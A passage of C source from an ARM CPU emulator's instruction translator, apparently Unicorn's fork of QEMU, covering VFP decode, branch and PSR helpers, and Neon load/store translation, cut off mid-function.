get_fpstatus_ptr(s, 0); + if (dp) { + gen_helper_rintd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, 
fpst); + } else { + gen_helper_rints(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpst); + } + tcg_temp_free_ptr(tcg_ctx, fpst); + break; + } + case 13: /* vrintz */ + { + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + TCGv_i32 tcg_rmode; + tcg_rmode = tcg_const_i32(tcg_ctx, float_round_to_zero); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + if (dp) { + gen_helper_rintd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, fpst); + } else { + gen_helper_rints(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpst); + } + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + tcg_temp_free_ptr(tcg_ctx, fpst); + break; + } + case 14: /* vrintx */ + { + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + if (dp) { + gen_helper_rintd_exact(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, fpst); + } else { + gen_helper_rints_exact(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpst); + } + tcg_temp_free_ptr(tcg_ctx, fpst); + break; + } + case 15: /* single<->double conversion */ + if (dp) + gen_helper_vfp_fcvtsd(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0d, tcg_ctx->cpu_env); + else + gen_helper_vfp_fcvtds(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); + break; + case 16: /* fuito */ + gen_vfp_uito(s, dp, 0); + break; + case 17: /* fsito */ + gen_vfp_sito(s, dp, 0); + break; + case 20: /* fshto */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_shto(s, dp, 16 - rm, 0); + break; + case 21: /* fslto */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_slto(s, dp, 32 - rm, 0); + break; + case 22: /* fuhto */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_uhto(s, dp, 16 - rm, 0); + break; + case 23: /* fulto */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_ulto(s, dp, 32 - rm, 0); + break; + case 24: /* ftoui */ + gen_vfp_toui(s, dp, 0); + break; + case 25: /* ftouiz */ + gen_vfp_touiz(s, dp, 0); + break; + 
case 26: /* ftosi */ + gen_vfp_tosi(s, dp, 0); + break; + case 27: /* ftosiz */ + gen_vfp_tosiz(s, dp, 0); + break; + case 28: /* ftosh */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_tosh(s, dp, 16 - rm, 0); + break; + case 29: /* ftosl */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_tosl(s, dp, 32 - rm, 0); + break; + case 30: /* ftouh */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_touh(s, dp, 16 - rm, 0); + break; + case 31: /* ftoul */ + if (!arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + gen_vfp_toul(s, dp, 32 - rm, 0); + break; + default: /* undefined */ + return 1; + } + break; + default: /* undefined */ + return 1; + } + + /* Write back the result. */ + if (op == 15 && (rn >= 8 && rn <= 11)) { + /* Comparison, do nothing. */ + } else if (op == 15 && dp && ((rn & 0x1c) == 0x18 || + (rn & 0x1e) == 0x6)) { + /* VCVT double to int: always integer result. + * VCVT double to half precision is always a single + * precision result. + */ + gen_mov_vreg_F0(s, 0, rd); + } else if (op == 15 && rn == 15) { + /* conversion */ + gen_mov_vreg_F0(s, !dp, rd); + } else { + gen_mov_vreg_F0(s, dp, rd); + } + + /* break out of the loop if we have finished */ + if (veclen == 0) + break; + + if (op == 15 && delta_m == 0) { + /* single source one-many */ + while (veclen--) { + rd = ((rd + delta_d) & (bank_mask - 1)) + | (rd & bank_mask); + gen_mov_vreg_F0(s, dp, rd); + } + break; + } + /* Setup the next operands. */ + veclen--; + rd = ((rd + delta_d) & (bank_mask - 1)) + | (rd & bank_mask); + + if (op == 15) { + /* One source operand. */ + rm = ((rm + delta_m) & (bank_mask - 1)) + | (rm & bank_mask); + gen_mov_F0_vreg(s, dp, rm); + } else { + /* Two source operands. 
*/ + rn = ((rn + delta_d) & (bank_mask - 1)) + | (rn & bank_mask); + gen_mov_F0_vreg(s, dp, rn); + if (delta_m) { + rm = ((rm + delta_m) & (bank_mask - 1)) + | (rm & bank_mask); + gen_mov_F1_vreg(s, dp, rm); + } + } + } + } + break; + case 0xc: + case 0xd: + if ((insn & 0x03e00000) == 0x00400000) { + /* two-register transfer */ + rn = (insn >> 16) & 0xf; + rd = (insn >> 12) & 0xf; + if (dp) { + VFP_DREG_M(rm, insn); + } else { + rm = VFP_SREG_M(insn); + } + + if (insn & ARM_CP_RW_BIT) { + /* vfp->arm */ + if (dp) { + gen_mov_F0_vreg(s, 0, rm * 2); + tmp = gen_vfp_mrs(s); + store_reg(s, rd, tmp); + gen_mov_F0_vreg(s, 0, rm * 2 + 1); + tmp = gen_vfp_mrs(s); + store_reg(s, rn, tmp); + } else { + gen_mov_F0_vreg(s, 0, rm); + tmp = gen_vfp_mrs(s); + store_reg(s, rd, tmp); + gen_mov_F0_vreg(s, 0, rm + 1); + tmp = gen_vfp_mrs(s); + store_reg(s, rn, tmp); + } + } else { + /* arm->vfp */ + if (dp) { + tmp = load_reg(s, rd); + gen_vfp_msr(s, tmp); + gen_mov_vreg_F0(s, 0, rm * 2); + tmp = load_reg(s, rn); + gen_vfp_msr(s, tmp); + gen_mov_vreg_F0(s, 0, rm * 2 + 1); + } else { + tmp = load_reg(s, rd); + gen_vfp_msr(s, tmp); + gen_mov_vreg_F0(s, 0, rm); + tmp = load_reg(s, rn); + gen_vfp_msr(s, tmp); + gen_mov_vreg_F0(s, 0, rm + 1); + } + } + } else { + /* Load/store */ + rn = (insn >> 16) & 0xf; + if (dp) + VFP_DREG_D(rd, insn); + else + rd = VFP_SREG_D(insn); + if ((insn & 0x01200000) == 0x01000000) { + /* Single load/store */ + offset = (insn & 0xff) << 2; + if ((insn & (1 << 23)) == 0) + offset = 0-offset; + if (s->thumb && rn == 15) { + /* This is actually UNPREDICTABLE */ + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, addr, s->pc & ~2); + } else { + addr = load_reg(s, rn); + } + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + if (insn & (1 << 20)) { + gen_vfp_ld(s, dp, addr); + gen_mov_vreg_F0(s, dp, rd); + } else { + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_st(s, dp, addr); + } + tcg_temp_free_i32(tcg_ctx, addr); + } else { + /* load/store multiple */ + int 
w = insn & (1 << 21); + if (dp) + n = (insn >> 1) & 0x7f; + else + n = insn & 0xff; + + if (w && !(((insn >> 23) ^ (insn >> 24)) & 1)) { + /* P == U , W == 1 => UNDEF */ + return 1; + } + if (n == 0 || (rd + n) > 32 || (dp && n > 16)) { + /* UNPREDICTABLE cases for bad immediates: we choose to + * UNDEF to avoid generating huge numbers of TCG ops + */ + return 1; + } + if (rn == 15 && w) { + /* writeback to PC is UNPREDICTABLE, we choose to UNDEF */ + return 1; + } + + if (s->thumb && rn == 15) { + /* This is actually UNPREDICTABLE */ + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, addr, s->pc & ~2); + } else { + addr = load_reg(s, rn); + } + if (insn & (1 << 24)) /* pre-decrement */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 0-((insn & 0xff) << 2)); + + if (dp) + offset = 8; + else + offset = 4; + for (i = 0; i < n; i++) { + if (insn & ARM_CP_RW_BIT) { + /* load */ + gen_vfp_ld(s, dp, addr); + gen_mov_vreg_F0(s, dp, rd + i); + } else { + /* store */ + gen_mov_F0_vreg(s, dp, rd + i); + gen_vfp_st(s, dp, addr); + } + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + } + if (w) { + /* writeback */ + if (insn & (1 << 24)) + offset = (0-offset) * n; + else if (dp && (insn & 1)) + offset = 4; + else + offset = 0; + + if (offset != 0) + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + } + } + break; + default: + /* Should never happen. 
*/
        return 1;
    }
    return 0;
}

/* Emit the end-of-TB branch to 'dest'.  If the destination lies in the same
 * guest page as this TB we may chain directly to the next TB via goto_tb
 * slot 'n'; otherwise exit with the PC updated so the main loop re-looks-up.
 */
static inline void gen_goto_tb(DisasContext *s, int n, target_ulong dest)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TranslationBlock *tb;

    tb = s->tb;
    if ((tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK)) {
        tcg_gen_goto_tb(tcg_ctx, n);
        gen_set_pc_im(s, dest);
        /* exit_tb argument encodes the TB pointer plus the chain-slot index */
        tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + n);
    } else {
        gen_set_pc_im(s, dest);
        tcg_gen_exit_tb(tcg_ctx, 0);
    }
}

/* Unconditional jump to 'dest'.  When single-stepping we use an indirect
 * branch instead of TB chaining so the debug exception still triggers.
 */
static inline void gen_jmp(DisasContext *s, uint32_t dest)
{
    if (unlikely(s->singlestep_enabled || s->ss_active)) {
        /* An indirect jump so that we still trigger the debug exception.  */
        if (s->thumb)
            dest |= 1;  /* keep the Thumb bit for the BX-style jump */
        gen_bx_im(s, dest);
    } else {
        gen_goto_tb(s, 0, dest);
        s->is_jmp = DISAS_TB_JUMP;
    }
}

/* 16x16->32 signed multiply (SMUL<x><y> family): x/y pick the top halfword
 * (arithmetic shift right 16) or the bottom halfword (sign-extend) of each
 * operand.  Result is left in t0.
 */
static inline void gen_mulxy(DisasContext *s, TCGv_i32 t0, TCGv_i32 t1, int x, int y)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    if (x)
        tcg_gen_sari_i32(tcg_ctx, t0, t0, 16);
    else
        gen_sxth(t0);
    if (y)
        tcg_gen_sari_i32(tcg_ctx, t1, t1, 16);
    else
        gen_sxth(t1);
    tcg_gen_mul_i32(tcg_ctx, t0, t0, t1);
}

/* Return the mask of PSR bits set by a MSR instruction.  */
static uint32_t msr_mask(DisasContext *s, int flags, int spsr)
{
    uint32_t mask;

    mask = 0;
    /* flags bits 0..3 select the c/x/s/f byte fields of the PSR.  */
    if (flags & (1 << 0))
        mask |= 0xff;
    if (flags & (1 << 1))
        mask |= 0xff00;
    if (flags & (1 << 2))
        mask |= 0xff0000;
    if (flags & (1 << 3))
        mask |= 0xff000000;

    /* Mask out undefined bits.  */
    mask &= ~CPSR_RESERVED;
    if (!arm_dc_feature(s, ARM_FEATURE_V4T)) {
        mask &= ~CPSR_T;
    }
    if (!arm_dc_feature(s, ARM_FEATURE_V5)) {
        mask &= ~CPSR_Q; /* V5TE in reality*/
    }
    if (!arm_dc_feature(s, ARM_FEATURE_V6)) {
        mask &= ~(CPSR_E | CPSR_GE);
    }
    if (!arm_dc_feature(s, ARM_FEATURE_THUMB2)) {
        mask &= ~CPSR_IT;
    }
    /* Mask out execution state and reserved bits.  */
    if (!spsr) {
        mask &= ~(CPSR_EXEC | CPSR_RESERVED);
    }
    /* Mask out privileged bits.  */
    if (IS_USER(s))
        mask &= CPSR_USER;
    return mask;
}

/* Returns nonzero if access to the PSR is not permitted. Marks t0 as dead. */
static int gen_set_psr(DisasContext *s, uint32_t mask, int spsr, TCGv_i32 t0)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tmp;
    if (spsr) {
        /* ??? This is also undefined in system mode.  */
        if (IS_USER(s))
            return 1;

        /* Read-modify-write: preserve SPSR bits outside 'mask'.  */
        tmp = load_cpu_field(s->uc, spsr);
        tcg_gen_andi_i32(tcg_ctx, tmp, tmp, ~mask);
        tcg_gen_andi_i32(tcg_ctx, t0, t0, mask);
        tcg_gen_or_i32(tcg_ctx, tmp, tmp, t0);
        store_cpu_field(tcg_ctx, tmp, spsr);
    } else {
        gen_set_cpsr(s, t0, mask);
    }
    tcg_temp_free_i32(tcg_ctx, t0);
    /* A CPSR write may change mode/flags, so force a TB lookup afterwards.  */
    gen_lookup_tb(s);
    return 0;
}

/* Returns nonzero if access to the PSR is not permitted.  Immediate form
 * of gen_set_psr(); materialises 'val' into a temp and delegates.
 */
static int gen_set_psr_im(DisasContext *s, uint32_t mask, int spsr, uint32_t val)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tmp;
    tmp = tcg_temp_new_i32(tcg_ctx);
    tcg_gen_movi_i32(tcg_ctx, tmp, val);
    return gen_set_psr(s, mask, spsr, tmp);
}

/* Generate an old-style exception return. Marks pc as dead. */
static void gen_exception_return(DisasContext *s, TCGv_i32 pc)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tmp;
    store_reg(s, 15, pc);
    /* Restore CPSR from the banked SPSR.  */
    tmp = load_cpu_field(s->uc, spsr);
    gen_set_cpsr(s, tmp, CPSR_ERET_MASK);
    tcg_temp_free_i32(tcg_ctx, tmp);
    s->is_jmp = DISAS_UPDATE;
}

/* Generate a v6 exception return.  Marks both values as dead.
*/
static void gen_rfe(DisasContext *s, TCGv_i32 pc, TCGv_i32 cpsr)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    /* Restore CPSR first, then write the return address into PC.  */
    gen_set_cpsr(s, cpsr, CPSR_ERET_MASK);
    tcg_temp_free_i32(tcg_ctx, cpsr);
    store_reg(s, 15, pc);
    s->is_jmp = DISAS_UPDATE;
}

/* Translate the NOP-compatible hint space (NOP/YIELD/WFE/WFI/SEV/SEVL).  */
static void gen_nop_hint(DisasContext *s, int val)
{
    switch (val) {
    case 3: /* wfi */
        gen_set_pc_im(s, s->pc);
        s->is_jmp = DISAS_WFI;
        break;
    case 2: /* wfe */
        gen_set_pc_im(s, s->pc);
        s->is_jmp = DISAS_WFE;
        break;
    case 4: /* sev */
    case 5: /* sevl */
        /* TODO: Implement SEV, SEVL and WFE.  May help SMP performance.  */
    default: /* nop */
        break;
    }
}

/* Shorthand for the common dest,src1,src2 triple on the cpu_V0/cpu_V1 temps. */
#define CPU_V001 tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1

/* Element-wise Neon add, t0 += t1; 'size' selects u8/u16/u32 lanes.  */
static inline void gen_neon_add(DisasContext *s, int size, TCGv_i32 t0, TCGv_i32 t1)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    switch (size) {
    case 0: gen_helper_neon_add_u8(tcg_ctx, t0, t0, t1); break;
    case 1: gen_helper_neon_add_u16(tcg_ctx, t0, t0, t1); break;
    case 2: tcg_gen_add_i32(tcg_ctx, t0, t0, t1); break;
    default: abort();
    }
}

/* Element-wise reverse subtract: t0 = t1 - t0.
 * NOTE(review): the default case silently returns instead of abort()ing as
 * gen_neon_add does; presumably callers only ever pass size 0..2, so the
 * branch is unreachable either way — confirm before changing.
 */
static inline void gen_neon_rsb(DisasContext *s, int size, TCGv_i32 t0, TCGv_i32 t1)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    switch (size) {
    case 0: gen_helper_neon_sub_u8(tcg_ctx, t0, t1, t0); break;
    case 1: gen_helper_neon_sub_u16(tcg_ctx, t0, t1, t0); break;
    case 2: tcg_gen_sub_i32(tcg_ctx, t0, t1, t0); break;
    default: return;
    }
}

/* 32-bit pairwise ops end up the same as the elementwise versions.
*/
#define gen_helper_neon_pmax_s32  gen_helper_neon_max_s32
#define gen_helper_neon_pmax_u32  gen_helper_neon_max_u32
#define gen_helper_neon_pmin_s32  gen_helper_neon_min_s32
#define gen_helper_neon_pmin_u32  gen_helper_neon_min_u32

/* Dispatch a sized signed/unsigned Neon helper that takes cpu_env.
 * (size << 1) | u selects among _s8/_u8/_s16/_u16/_s32/_u32; any other
 * combination makes the *enclosing function* return 1 (UNDEF).
 * Expects 'tcg_ctx', 'tmp' and 'tmp2' in scope at the expansion site.
 */
#define GEN_NEON_INTEGER_OP_ENV(name) do { \
    switch ((size << 1) | u) { \
    case 0: \
        gen_helper_neon_##name##_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \
        break; \
    case 1: \
        gen_helper_neon_##name##_u8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \
        break; \
    case 2: \
        gen_helper_neon_##name##_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \
        break; \
    case 3: \
        gen_helper_neon_##name##_u16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \
        break; \
    case 4: \
        gen_helper_neon_##name##_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \
        break; \
    case 5: \
        gen_helper_neon_##name##_u32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); \
        break; \
    default: return 1; \
    }} while (0)

/* Same as GEN_NEON_INTEGER_OP_ENV but for helpers that do not take cpu_env. */
#define GEN_NEON_INTEGER_OP(name) do { \
    switch ((size << 1) | u) { \
    case 0: \
        gen_helper_neon_##name##_s8(tcg_ctx, tmp, tmp, tmp2); \
        break; \
    case 1: \
        gen_helper_neon_##name##_u8(tcg_ctx, tmp, tmp, tmp2); \
        break; \
    case 2: \
        gen_helper_neon_##name##_s16(tcg_ctx, tmp, tmp, tmp2); \
        break; \
    case 3: \
        gen_helper_neon_##name##_u16(tcg_ctx, tmp, tmp, tmp2); \
        break; \
    case 4: \
        gen_helper_neon_##name##_s32(tcg_ctx, tmp, tmp, tmp2); \
        break; \
    case 5: \
        gen_helper_neon_##name##_u32(tcg_ctx, tmp, tmp, tmp2); \
        break; \
    default: return 1; \
    }} while (0)

/* Read Neon scratch slot 'scratch' from CPUARMState into a fresh temp.  */
static TCGv_i32 neon_load_scratch(TCGContext *tcg_ctx, int scratch)
{
    TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx);
    tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, vfp.scratch[scratch]));
    return tmp;
}

/* Write 'var' into Neon scratch slot 'scratch'; frees (kills) 'var'.  */
static void neon_store_scratch(TCGContext *tcg_ctx, int scratch, TCGv_i32 var)
{
    tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, vfp.scratch[scratch]));
    tcg_temp_free_i32(tcg_ctx, var);
}

/* Load a scalar operand for a by-scalar Neon op and replicate it across a
 * 32-bit temp.  For 16-bit scalars the register index also encodes which
 * halfword to duplicate (bit 3).
 */
static inline TCGv_i32 neon_get_scalar(DisasContext *s, int size, int reg)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tmp;
    if (size == 1) {
        tmp = neon_load_reg(tcg_ctx, reg & 7, reg >> 4);
        if (reg & 8) {
            gen_neon_dup_high16(s, tmp);
        } else {
            gen_neon_dup_low16(s, tmp);
        }
    } else {
        tmp = neon_load_reg(tcg_ctx, reg & 15, reg >> 4);
    }
    return tmp;
}

/* VUZP: de-interleave registers rd/rm in place via helpers.  Returns nonzero
 * (UNDEF) for the unsupported 64-bit-total case (!q && size == 2).
 */
static int gen_neon_unzip(TCGContext *tcg_ctx, int rd, int rm, int size, int q)
{
    TCGv_i32 tmp, tmp2;
    if (!q && size == 2) {
        return 1;
    }
    /* Helpers take register *indices*, not values.  */
    tmp = tcg_const_i32(tcg_ctx, rd);
    tmp2 = tcg_const_i32(tcg_ctx, rm);
    if (q) {
        switch (size) {
        case 0:
            gen_helper_neon_qunzip8(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2);
            break;
        case 1:
            gen_helper_neon_qunzip16(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2);
            break;
        case 2:
            gen_helper_neon_qunzip32(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2);
            break;
        default:
            abort();
        }
    } else {
        switch (size) {
        case 0:
            gen_helper_neon_unzip8(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2);
            break;
        case 1:
            gen_helper_neon_unzip16(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2);
            break;
        default:
            abort();
        }
    }
    tcg_temp_free_i32(tcg_ctx, tmp);
    tcg_temp_free_i32(tcg_ctx, tmp2);
    return 0;
}

/* VZIP: interleave registers rd/rm in place via helpers.  Same UNDEF rule
 * as gen_neon_unzip().
 */
static int gen_neon_zip(TCGContext *tcg_ctx, int rd, int rm, int size, int q)
{
    TCGv_i32 tmp, tmp2;
    if (!q && size == 2) {
        return 1;
    }
    tmp = tcg_const_i32(tcg_ctx, rd);
    tmp2 = tcg_const_i32(tcg_ctx, rm);
    if (q) {
        switch (size) {
        case 0:
            gen_helper_neon_qzip8(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2);
            break;
        case 1:
            gen_helper_neon_qzip16(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2);
            break;
        case 2:
            gen_helper_neon_qzip32(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2);
            break;
        default:
            abort();
        }
    } else {
        switch (size) {
        case 0:
            gen_helper_neon_zip8(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2);
            break;
        case 1:
            gen_helper_neon_zip16(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2);
            break;
        default:
            abort();
        }
    }
    tcg_temp_free_i32(tcg_ctx, tmp);
    tcg_temp_free_i32(tcg_ctx, tmp2);
    return 0;
}

/* VTRN for byte elements: swap the odd bytes of t0 with the even bytes of t1
 * using shift/mask/or on the packed 32-bit lanes.
 */
static void gen_neon_trn_u8(TCGContext *tcg_ctx, TCGv_i32 t0, TCGv_i32 t1)
{
    TCGv_i32 rd, tmp;

    rd = tcg_temp_new_i32(tcg_ctx);
    tmp = tcg_temp_new_i32(tcg_ctx);

    tcg_gen_shli_i32(tcg_ctx, rd, t0, 8);
    tcg_gen_andi_i32(tcg_ctx, rd, rd, 0xff00ff00);
    tcg_gen_andi_i32(tcg_ctx, tmp, t1, 0x00ff00ff);
    tcg_gen_or_i32(tcg_ctx, rd, rd, tmp);

    tcg_gen_shri_i32(tcg_ctx, t1, t1, 8);
    tcg_gen_andi_i32(tcg_ctx, t1, t1, 0x00ff00ff);
    tcg_gen_andi_i32(tcg_ctx, tmp, t0, 0xff00ff00);
    tcg_gen_or_i32(tcg_ctx, t1, t1, tmp);
    tcg_gen_mov_i32(tcg_ctx, t0, rd);

    tcg_temp_free_i32(tcg_ctx, tmp);
    tcg_temp_free_i32(tcg_ctx, rd);
}

/* VTRN for halfword elements: swap the high half of t0 with the low half
 * of t1 (in packed form).
 */
static void gen_neon_trn_u16(TCGContext *tcg_ctx, TCGv_i32 t0, TCGv_i32 t1)
{
    TCGv_i32 rd, tmp;

    rd = tcg_temp_new_i32(tcg_ctx);
    tmp = tcg_temp_new_i32(tcg_ctx);

    tcg_gen_shli_i32(tcg_ctx, rd, t0, 16);
    tcg_gen_andi_i32(tcg_ctx, tmp, t1, 0xffff);
    tcg_gen_or_i32(tcg_ctx, rd, rd, tmp);
    tcg_gen_shri_i32(tcg_ctx, t1, t1, 16);
    tcg_gen_andi_i32(tcg_ctx, tmp, t0, 0xffff0000);
    tcg_gen_or_i32(tcg_ctx, t1, t1, tmp);
    tcg_gen_mov_i32(tcg_ctx, t0, rd);

    tcg_temp_free_i32(tcg_ctx, tmp);
    tcg_temp_free_i32(tcg_ctx, rd);
}


/* Per-'op' decode table for VLDn/VSTn "all elements" forms:
 * number of registers transferred, element interleave factor, and
 * register spacing (1 = consecutive D regs, 2 = every other D reg).
 */
static struct {
    int nregs;
    int interleave;
    int spacing;
} neon_ls_element_type[11] = {
    {4, 4, 1},
    {4, 4, 2},
    {4, 1, 1},
    {4, 2, 1},
    {3, 3, 1},
    {3, 3, 2},
    {3, 1, 1},
    {1, 1, 1},
    {2, 2, 1},
    {2, 2, 2},
    {2, 1, 1}
};

/* Translate a NEON load/store element instruction.  Return nonzero if the
   instruction is invalid.
*/
static int disas_neon_ls_insn(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int rd, rn, rm;
    int op;
    int nregs;
    int interleave;
    int spacing;
    int stride;
    int size;
    int reg;
    int pass;
    int load;
    int shift;
    int n;
    TCGv_i32 addr;
    TCGv_i32 tmp;
    TCGv_i32 tmp2;
    TCGv_i64 tmp64;

    /* FIXME: this access check should not take precedence over UNDEF
     * for invalid encodings; we will generate incorrect syndrome information
     * for attempts to execute invalid vfp/neon encodings with FP disabled.
     */
    if (!s->cpacr_fpen) {
        gen_exception_insn(s, 4, EXCP_UDEF,
                           syn_fp_access_trap(1, 0xe, s->thumb));
        return 0;
    }

    if (!s->vfp_enabled)
        return 1;
    VFP_DREG_D(rd, insn);
    rn = (insn >> 16) & 0xf;    /* base address register */
    rm = insn & 0xf;            /* 15: no writeback; 13: imm writeback; else reg */
    load = (insn & (1 << 21)) != 0;
    if ((insn & (1 << 23)) == 0) {
        /* Load store all elements.  */
        op = (insn >> 8) & 0xf;
        size = (insn >> 6) & 3;
        if (op > 10)
            return 1;
        /* Catch UNDEF cases for bad values of align field */
        switch (op & 0xc) {
        case 4:
            if (((insn >> 5) & 1) == 1) {
                return 1;
            }
            break;
        case 8:
            if (((insn >> 4) & 3) == 3) {
                return 1;
            }
            break;
        default:
            break;
        }
        nregs = neon_ls_element_type[op].nregs;
        interleave = neon_ls_element_type[op].interleave;
        spacing = neon_ls_element_type[op].spacing;
        if (size == 3 && (interleave | spacing) != 1)
            return 1;
        addr = tcg_temp_new_i32(tcg_ctx);
        load_reg_var(s, addr, rn);
        stride = (1 << size) * interleave;
        for (reg = 0; reg < nregs; reg++) {
            /* Interleaved accesses restart from the base with a per-register
             * offset rather than running linearly.
             */
            if (interleave > 2 || (interleave == 2 && nregs == 2)) {
                load_reg_var(s, addr, rn);
                tcg_gen_addi_i32(tcg_ctx, addr, addr, (1 << size) * reg);
            } else if (interleave == 2 && nregs == 4 && reg == 2) {
                load_reg_var(s, addr, rn);
                tcg_gen_addi_i32(tcg_ctx, addr, addr, 1 << size);
            }
            if (size == 3) {
                /* 64-bit elements: one whole D register per access.  */
                tmp64 = tcg_temp_new_i64(tcg_ctx);
                if (load) {
                    gen_aa32_ld64(s, tmp64, addr, get_mem_index(s));
                    neon_store_reg64(tcg_ctx, tmp64, rd);
                } else {
                    neon_load_reg64(tcg_ctx, tmp64, rd);
                    gen_aa32_st64(s, tmp64, addr, get_mem_index(s));
                }
                tcg_temp_free_i64(tcg_ctx, tmp64);
                tcg_gen_addi_i32(tcg_ctx, addr, addr, stride);
            } else {
                /* Smaller elements: two 32-bit passes per D register.  */
                for (pass = 0; pass < 2; pass++) {
                    if (size == 2) {
                        if (load) {
                            tmp = tcg_temp_new_i32(tcg_ctx);
                            gen_aa32_ld32u(s, tmp, addr, get_mem_index(s));
                            neon_store_reg(tcg_ctx, rd, pass, tmp);
                        } else {
                            tmp = neon_load_reg(tcg_ctx, rd, pass);
                            gen_aa32_st32(s, tmp, addr, get_mem_index(s));
                            tcg_temp_free_i32(tcg_ctx, tmp);
                        }
                        tcg_gen_addi_i32(tcg_ctx, addr, addr, stride);
                    } else if (size == 1) {
                        /* Two 16-bit accesses packed into one 32-bit lane.  */
                        if (load) {
                            tmp = tcg_temp_new_i32(tcg_ctx);
                            gen_aa32_ld16u(s, tmp, addr, get_mem_index(s));
                            tcg_gen_addi_i32(tcg_ctx, addr, addr, stride);
                            tmp2 = tcg_temp_new_i32(tcg_ctx);
                            gen_aa32_ld16u(s, tmp2, addr, get_mem_index(s));
                            tcg_gen_addi_i32(tcg_ctx, addr, addr, stride);
                            tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16);
                            tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2);
                            tcg_temp_free_i32(tcg_ctx, tmp2);
                            neon_store_reg(tcg_ctx, rd, pass, tmp);
                        } else {
                            tmp = neon_load_reg(tcg_ctx, rd, pass);
                            tmp2 = tcg_temp_new_i32(tcg_ctx);
                            tcg_gen_shri_i32(tcg_ctx, tmp2, tmp, 16);
                            gen_aa32_st16(s, tmp, addr, get_mem_index(s));
                            tcg_temp_free_i32(tcg_ctx, tmp);
                            tcg_gen_addi_i32(tcg_ctx, addr, addr, stride);
                            gen_aa32_st16(s, tmp2, addr, get_mem_index(s));
                            tcg_temp_free_i32(tcg_ctx, tmp2);
                            tcg_gen_addi_i32(tcg_ctx, addr, addr, stride);
                        }
                    } else /* size == 0 */ {
                        /* Four byte accesses assembled into one 32-bit lane. */
                        if (load) {
                            TCGV_UNUSED_I32(tmp2);
                            for (n = 0; n < 4; n++) {
                                tmp = tcg_temp_new_i32(tcg_ctx);
                                gen_aa32_ld8u(s, tmp, addr, get_mem_index(s));
                                tcg_gen_addi_i32(tcg_ctx, addr, addr, stride);
                                if (n == 0) {
                                    tmp2 = tmp;
                                } else {
                                    tcg_gen_shli_i32(tcg_ctx, tmp, tmp, n * 8);
                                    tcg_gen_or_i32(tcg_ctx, tmp2, tmp2, tmp);
                                    tcg_temp_free_i32(tcg_ctx, tmp);
                                }
                            }
